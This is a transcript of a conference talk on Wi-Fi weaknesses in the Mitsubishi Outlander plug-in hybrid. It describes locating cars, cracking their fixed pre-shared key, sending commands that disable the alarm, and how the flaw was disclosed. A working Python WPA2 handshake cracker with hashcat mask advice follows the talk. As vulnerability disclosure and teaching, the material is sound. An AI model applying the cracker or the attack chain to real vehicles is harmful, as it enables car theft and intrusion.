Well, good morning, everybody. Hello, my name's Ken, and I've got a short talk today about some work we did on the Mitsubishi Outlander plug-in hybrid SUV. Now, the good news is that right now this vehicle is not shipping in the US; I believe it ships in the fall this year. But we've got about a hundred thousand of these across Europe and Asia, so they're everywhere. I really, really wanted to bring the vehicle with me, but it wouldn't fit in my checked baggage, unfortunately, so you've got to put up with my videos, I'm afraid. It's not a long talk. It's a ridiculously simple hack; it's not complicated. I hope that you will be as surprised as I was when we found these bugs. It just blew my mind. Anyway, that is my vehicle. Those aren't my plates, I might add, unsurprisingly.

A little bit of background: who are we? We're a company called Pen Test Partners; the clue's in the name, we're pentesters, unsurprisingly. Back in the day... I'm really into electric vehicles, and a buddy of mine took delivery of a BMW i3 about two years ago and then got an i8 about a year ago, which is an awesome vehicle. I love it, absolutely love it. You've probably seen various issues with BMW ConnectedDrive, their mobile application. We found one of the first a couple of years ago. It was an issue to do with the way that iRemote, which is the mobile app for the i-series vehicles, is configured, and there was an issue to do with the way you could force password resets: temporary passwords that are brute-forceable. You could provision a new version of the mobile app, you could geolocate the vehicle, you could pop the locks, and then you're in. About a year ago they had another issue where it was shown that the communications were done in plaintext; that was all fixed. And I don't know if you saw last week, there was another issue published, a really interesting vulnerability to do with enumerating VIN numbers. Anyway, there we go. I want to tell you about the mobile app.
So this is the mobile app for my vehicle. You can do some stuff with it. The key function of it is to set up a charging schedule. So if you've got an electric vehicle, you want to charge it on cheaper electricity overnight. You can use the application and say, right, well, charge between midnight and 5 a.m., which back home is when we get cheap-rate electricity, which is really cool. So my car is half the price to charge up. You can also turn on the AC in the morning, so if it's a hot day, cool it off; but if you live in the UK you need the heat in the morning because it's freezing and raining. There you go. It does some other stuff too.

What's really unusual is the way that the mobile application connects to the vehicle. So if you have a smart vehicle, you have a mobile application for it, and you probably talk to it using an API over cellular data, or maybe Wi-Fi. This is different. It uses Wi-Fi to talk directly to an access point on the vehicle, and that's really unusual. I don't know, has anyone else seen another vehicle that works like this? It's the first one I've seen; I cannot find another one that does this. There is an AP on the vehicle, and the mobile app talks directly to the vehicle over Wi-Fi. That's really, really unusual, and that got me interested. I genuinely was in the parking lot at my kids' school, this is, I didn't make this up, genuine, and I was looking for some Wi-Fi and I saw an unusual access point name pop up. Whoa, what's that? What's going on there? And I spoke to a buddy of mine, who kind of looked roughly where, as the car went past, and he said, yeah, that's my car. It's like, what, you have an access point on your car? Yeah, it's really cool. So, in order to talk... Is that working, guys? One, two, one, two. It's a bit crusty. Okay, I'll speak up, shall I? Can we get some more gain on that, guys? No? Maybe not, so I'll just shout. Yeah, that's much better. Good.
Okay. So what's really weird: the access point is encrypted, as you'd expect. It has a pre-shared key, what a surprise. In order to connect to it, that PSK is printed on a piece of paper in the owner's manual. What's really weird is the SSID: you can change it in the field, although the function doesn't actually work; in theory you can change it. The pre-shared key cannot be changed; that's actually fixed. And, you know, once I'd looked at this for a while: there's some trouble here, we need to start looking at this. So the SSID format is straightforward. It's the word REMOTE in capital letters, then two numbers, then four letters. The scary bit is the pre-shared key format. It's lowercase alpha, six characters, and the charset of lowercase alpha is 21 characters, not 26. Really quick. So we captured the handshake and cracked it. We used some 970s; four of those ran for two and a half days. We're building a bigger rig at the moment with 16 GPUs, and that's going to go real quick. But if you're in a hurry, you can just upload to somewhere like AWS. We calculated the cost as being around a thousand dollars. That's a lot of money, but this is a $40,000 vehicle, all right? It's expensive. That's kind of a trade I think I'd go for, actually.

We connected to it. Really unusual. So it has a static IP address, 192.something.8.46. Port 80 is there but there's no service running; I don't know what that's for, I can't figure that out. But TCP port 8080 is open, and that's what we got, so you can retrieve the VIN; as you can see, that's disclosed there. You can also see the SSID. That VIN's not my car. And there's some other stuff in there as well, I promise you it's not... It's pretty obviously a binary protocol. It's a GainSpan Wi-Fi module, a very, very popular module, really interesting and quite fun. So, what did we do? So, I hope that's going to work. There we go. So I'm in the middle of the connection; we sniffed it making some requests, in this particular case...
We were actually turning on the lights. So let's follow that. From one end... and you get a bunch of junk, that of course being a binary protocol. Stuff it into a hex dump and you get a load of interesting data. The messaging: the red is the vehicle talking to the mobile application, the blue is the mobile application responding back again. It's really hard. I mean, we first wanted to fuzz this and see what we could do, but it'll only pretty much stand up for one message every 15 seconds or so. The entire vehicle status, as far as we can make out, goes to the application, and the entire status goes back again. So it's really slow. So we started playing around with this, had a bit of a look, and started seeing messaging popping up. Now this particular one we were... with any function we ran... just: let's turn on the lights, and that's a function of your mobile app. It's quite useful if you want to find your vehicle in a car park or, you know, in a driveway. The only slight challenge with this is that it only works when you're in Wi-Fi range. It's not like you can do it from anywhere; you can only do it when you're in Wi-Fi range. I don't know if you've ever mislaid your vehicle in a parking lot, but if it's on your phone over Wi-Fi, you're there anyway, right? I don't know.

So we started having a bit of a play around with this and we did the classics. We chopped up the packet, we replayed, we chopped again: which part of the pcap was actually making it work? And we finally got down to a point where we could successfully make it work. Then we started to analyse all the packets we were sending, so the messages that would be sent, and explain these. So that's pretty straightforward. The bit that threw us for a while was that some of the messaging is six bytes and some of it is seven bytes. That really threw us.
We were really struggling to make any progress with this. Send the bytes, add a checksum; it's really easy once you understand how the protocol works. It's just not rocket science. So if you want to have some fun: capture the handshake, crack the key, send six bytes. And I have video of this because I couldn't bring the vehicle with me, and this happens. So we're no longer replaying; we just talk directly to the car and the lights come on. Okay, so what, it's the lights? Okay, it's an electric vehicle; we're going to start draining the battery a little bit. So what, you know, it's just lights, right?

So then we started having a quick look at the mobile application. Got it over here, went into the Android version, come on, there you go, and started seeing how some more of the functionality was working. We'd done it by replay; we'd already achieved everything we wanted to, but now you can start having a look at the code. So that class tells you how to construct the messages. The interesting bit is down here; sorry, the resolution's a bit crazy. You can start seeing various functions here. So these are the commands, the values you need to send, and that will trigger various actions on the vehicle. So it has a battery heater: when it's cold you can heat the battery up to make it work more efficiently. But there's loads and loads of other fun stuff in there. We've had some issues with making some of these work, but the commands that are quite interesting... you can see AC, you can start seeing charge presets, and that's where things get quite good fun. And that was the one that got us interested. What could possibly go wrong at this point, right? So as I said at the beginning, this is about playing around with the charging schedules; that's the primary focus of the application.
So you could drain someone's car. You could crack the Wi-Fi key and then turn on the AC, so when their vehicle's left on their driveway, run the AC permanently, and then you get down there and, believe me, it's really, really annoying when you forget to charge your electric vehicle in the morning. It's a real problem. I've got a hybrid, so you can still go somewhere, but I really like electric cars.

You have to put up with my crazy video, I'm afraid. This is one we recorded, so I want to show you this; keep an eye on the hazard lights here. So you can see the lights are actually flashing there, so the alarm is on. Okay, that shows the alarm is working; the interior volumetric theft alarm is operating. The only thing I cheated with there a little bit: I wound the window down, otherwise every time I do this demo I'd have to replace my driver's side window glass, which is kind of awkward. So that's operating as it should do. However, if you send it that seven bytes... and this happens. That's all you need to send it, guys. Watch the hazard lights there. See, they're not going off, and the crazy bit is, unless you've deadlocked the vehicle, you can reach in and pop the door. Okay, so we've now deactivated the theft alarm for a vehicle. Now the next place... we've got quite a lot of work to do on this. So you now have access to the diagnostics ports. So the next step was... Just because the Wi-Fi key was too short, we coded this up into a nice Python script, so it's all there.

Now, at the same time as disclosing this, we also put out an unregistration procedure, and what that does is, once the access point on the vehicle has no more Wi-Fi pairings, no associations, it powers down, and in order to re-enable it you have to press the remote key button ten times. So it's really easy to fix this. There's another way that Mitsubishi published, which is you have to press the remote key 30 times, and that has the same effect. I like my version.
It's quicker, anyway. The other fun thing about this is, because it uses Wi-Fi, you can go find the vehicles. So this is the UK; as I said, these aren't shipping in the USA right now, but that's the UK. There are about 22, 23,000 of these vehicles on the road right now. We did a query on WiGLE and found 6,000 hits of these vehicles parked on people's driveways. Yeah, that makes things quite different, doesn't it? It means you can find the vehicle. You know, it's horrible: you drive to it, you capture the handshake, you come back a bit later having cracked the key, and you take the vehicle. Now, we did some fun analysis here. So we analysed the three weeks before we disclosed, that's that lot, and then we analysed the three-week window after disclosure, and still 400 people have left the Wi-Fi enabled on their Outlanders. Wow. So we're disclosing exactly how to hack this vehicle: go and find a car, crack the key, disable the alarm, steal the car. Wow, that's just nuts.

Longer term, so there is a function in the mobile app: you can actually update the firmware for the vehicle. That's the firmware; just unzip it. It's got very little debug information in, so I haven't spent much time looking at this, but there's a bunch of strings there; you can see how it's creating the Wi-Fi connection. I think the PSK is derived in here; I'm not sure how yet. We're working on that right now. I'm quite concerned, though, that in order to fix this bug you're asking the consumer to connect to it over Wi-Fi. One thing that concerns me is this Wi-Fi connection is quite unstable; it drops out. That's just what you normally... Just a little bit scary, and I don't know, but if that firmware update went wrong, I'd have quite an expensive brick sat on my driveway. I don't know about you. I'll let you know how we get on with the firmware, but it's in the mobile application there.

I want to talk about disclosure, because this is a bit of a train wreck. We always... We spoke to them; we got no response.
We spoke to them 10 days later, and I've never had such a weird phone conversation in my life. They said they'd had no reports of this anywhere in the world. So... you just can't... I launched to speak to the press, so I did, and I spoke to the BBC, and now Mitsubishi think it's very serious, and they're working, in fairness, really hard. They've actually been really good since. I think the reason they had a bit of a fail there is because they weren't able to deal with the security risk. Yeah, that's awesome, you know. We know what disclosure should have happened, you know: they should have said, yeah, that's great, we go and show them what the problem is, they fix it, we then disclose after. I wish that had happened. I really do.

There's still lots of stuff we've got to work on. We found the module in the end; that took a lot of finding. Actually, it's tucked away behind the front, and it's called a body network control module. Usually these have GSM modules in, but unusually this has got a GainSpan Wi-Fi module. So we spent some time having a look at the connections between that module and CAN, and the stuff I'm going around there will be disclosed through to Mitsubishi, obviously. There is lots of extra functionality in the mobile application that's not used. So for example, there is door lock control, so you could pop the doors, potentially. We can't figure out how to make that go at the moment; we're just running out of time. The other crazy bit as well is the mobile app. It really is a bit flaky, and, you know, you're supposed to store sensitive data and stuff... This is stored in an unencrypted SQLite database in the mobile app. Great. And there's some unexpected functions as well. We found one: change gun status. Wow. Totally, we need to find where that is on my vehicle. It's very James Bond.
I'm sure. But just to wrap up, guys: you know, we've been doing this for a long time, but our background is actually in industrial control systems and SCADA, and actually it translated quite nicely into vehicles and some of the other crazy stuff we've done and are doing. You might remember the work we did on the Wi-Fi kettle last year. We hacked the IoT fridge last year, and we're already working on their smart fridge this year. Well, the crazy thing came out: we were asked to help with CSI: Cyber, to write a hack script, and that didn't go well, unsurprisingly. We also do quite a bit of work in automotive as well. The big challenge you usually have is, you know, how do you get hold of the vehicles to have a good go and get something useful? Anyway, guys, I hope you enjoyed it. We tweet about this all the time.

Great idea, wasn't it? Yeah. I'm sorry, what's that again? How'd you find the vehicle? Okay, so this relies upon wardrivers going out there and geolocating the vehicles. So there's always a lag. So, you know, you might see the vehicle on the road, but, you know, it's moved by the time you see updates on WiGLE. But when it's parked at someone's house, it's highly likely it's going to be there next time you drive by in the evening. So, yeah, obviously WiGLE takes time to update. Although, that said, my vehicle was located at a trade show at a booth in London and it had been there 24 hours. So, yeah, it was pretty nuts. There's another question. Yeah?

Have you tried the same thing on a moving vehicle? That's what I want to do next. Yeah, obviously you need quite a few people; you need someone driving both cars, and yeah, we believe it works. Wait, have we tried this on a moving vehicle? The answer is no. So, yeah, very much like Charlie Miller and Chris Valasek said, you know, we want to do a Jeep at speed next to it, but until we reach the CAN, probably not so much.
Sorry, but they have to be in Wi-Fi range? Yeah, yeah, it's got to be in Wi-Fi range of the vehicle.

How did you decompile the app? Sorry? Just the APK. I used JD, but yeah, JADX or JD, that does the job for you.

How much time did you spend on the vehicle? Sorry? How much time? So, probably about a week in total, spread over a couple of months. Yeah, so it wasn't a big, complicated, time-consuming hack; it was really easy.

Do you think the reason they have a fixed PSK and SSID is something deeper, or that they're just too lazy? Maybe they use them for something else? So, there's probably a deeper question there, actually, which is: why use Wi-Fi? I believe the reason is it's a heck of a lot cheaper than setting up a GSM connection, an API, servers. It's just much cheaper, I think, to have a Wi-Fi module connect direct. So, given that this was done in terms of cost, I think the answer to your question is probably that it's done in terms of cost as well. It would have been more expensive to code up a method of updating the PSK; you'd be having to push updates into the module, and I think that would have cost more money. So, I think it's a question of cost, frankly.

Yeah, so just go and search the Play Store for Inventek, or Mitsubishi; you'll get that hit straight away.

Have you tried any other vehicles, or just Mitsubishi? Well, that's the thing: we've only really looked at this because it was obvious Wi-Fi. I haven't found any more vehicles that actually use Wi-Fi for the interface between the smart application and the vehicle. Everything else goes through an API, so the answer to the question is no, because I haven't found another one that does. But if you do, please tell me. Actually, some cars still use it. Really?
Yeah. Oh, wow. That's even better, so it's like Mitsubishi, but it contains some of them. Cool, I'd really like to know about that; I'd really like to know about that, thank you.

For the app, do they also have, like, login information? No. But what I mean is, is there a login for the app? No, no. There is the function: you can put a PIN in front of the application, but that's actually very easy to bypass. So there is no auth, because there's no API. But there's a PIN, right? If you set one up, yeah; so there's a second PIN you can enable in the same application. So, like, after you extract the APK, is there a chance that the PIN will also be stored? Don't know, I've never looked, actually. I guess I've seen a lot of, like, apps for cars where they store usernames and passwords. Okay. Yeah, I've never seen that. So I think maybe there's also a chance that they store things. Yeah, that's a good thought, yeah. In the shared prefs, because, like, they remember... That's a good thought, man, thank you. Good.

Question, yes. I can understand how... how is the legit owner authenticated to the vehicle, not by... You know, you have to write that key, like, I think it's about that... There isn't; there was no further authentication to the vehicle. Right. It's the PSK, and that is it. Yeah. Yeah, it really is; once you've cracked the key, you've got the car. But how does it... I mean... But there isn't; so they get the key in the manual, so it's printed in the owner's manual. Yeah. Yeah, yeah, you do have to crack a key per vehicle, yeah, quite, yeah. Yeah, but there is no further auth, I know, crazy. Cool, any more questions? Guys, if anyone wants anything urgent, I'll be in the IoT Village for the next two days working on the fridge, so maybe see you there. Thank you.
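The "capture the handshake, crack the key" step the talk describes, as an added example that is not part of the talk and not Pen Test Partners' code: a minimal offline WPA2-PSK check plus mask search in Python. The key format stated in the talk (six lowercase letters from a 21-letter alphabet) is used only for the keyspace arithmetic; the SSID, MAC addresses, nonces, EAPOL frame and passphrase below are constructed placeholders, and the demo search runs over a tiny charset so it finishes in seconds. In practice you would hand the real handshake to hashcat (mode 22000, or the older 2500) with a six-character mask over a custom charset of those 21 letters; this code shows what that tool is doing per candidate and why the per-candidate PBKDF2 cost only matters when the keyspace is large.

```python
"""Offline WPA2-PSK recovery from a sniffed 4-way handshake.

Added example (not code from the talk or from Pen Test Partners).
All handshake material here is constructed for the demo, not captured
from any vehicle: SSID, MACs, nonces and the EAPOL frame are made up.
"""
import hashlib
import hmac
import itertools


def pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2 PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes, SSID as salt.

    The SSID salt is why a key must be cracked per vehicle even though the
    key format is shared; the 4096 rounds are the only per-guess cost."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_bytes: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 over both MACs and both nonces. PTK[0:16] is the KCK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        msg = b"Pairwise key expansion\x00" + data + bytes([i])
        out += hmac.new(pmk_bytes, msg, hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP key MIC: HMAC-SHA1 over the EAPOL-Key frame (MIC field
    zeroed), truncated to 16 bytes. TKIP networks use HMAC-MD5 instead."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def candidate_matches(passphrase: str, hs: dict) -> bool:
    """True if this passphrase reproduces the MIC the real client sent."""
    kck = ptk(pmk(passphrase, hs["ssid"]), hs["aa"], hs["spa"],
              hs["anonce"], hs["snonce"])[:16]
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def crack(hs: dict, charset: str, length: int):
    """Mask attack: try every string of `length` characters from `charset`."""
    for tup in itertools.product(charset, repeat=length):
        pw = "".join(tup)
        if candidate_matches(pw, hs):
            return pw
    return None


def keyspace(charset_size: int, length: int) -> int:
    """Number of candidates for a fixed-length key over a fixed alphabet."""
    return charset_size ** length


def estimated_hours(charset_size: int, length: int, hashes_per_second: float) -> float:
    """Worst-case wall-clock time to exhaust the mask at a given PBKDF2 rate."""
    return keyspace(charset_size, length) / hashes_per_second / 3600


def build_handshake(passphrase: str, ssid: str = "REMOTE12abcd") -> dict:
    """Constructed stand-in for what a sniffer would give you from EAPOL
    message 2, plus the MIC the legitimate phone produced with the real PSK."""
    hs = {
        "ssid": ssid,                            # assumed REMOTE + 2 digits + 4 letters
        "aa": bytes.fromhex("001122334455"),     # AP (vehicle) MAC, made up
        "spa": bytes.fromhex("66778899aabb"),    # station (phone) MAC, made up
        "anonce": bytes(range(32)),              # made-up nonces
        "snonce": bytes(range(32, 64)),
        # placeholder EAPOL-Key frame with its 16 MIC bytes already zeroed
        "eapol": bytes([0x01, 0x03, 0x00, 0x5F]) + bytes(0x5F),
    }
    kck = ptk(pmk(passphrase, ssid), hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])[:16]
    hs["mic"] = eapol_mic(kck, hs["eapol"])
    return hs


if __name__ == "__main__":
    demo = build_handshake("cab")                # "owner's" PSK, known only to build_handshake
    print("recovered PSK:", crack(demo, "abc", 3))
    print("21^6 keyspace:", keyspace(21, 6))
    print("hours at 300 kH/s:", round(estimated_hours(21, 6, 300_000), 2))
```

The interesting number is `keyspace(21, 6)`, about 85.8 million candidates: each costs one 4096-round PBKDF2, so a GPU rig doing a few hundred thousand PBKDF2 evaluations per second exhausts it in minutes, not days, and a fixed, unchangeable key means one capture is enough for the life of the vehicle. A longer key over the full printable range, or a rotating key, moves the same arithmetic out of reach.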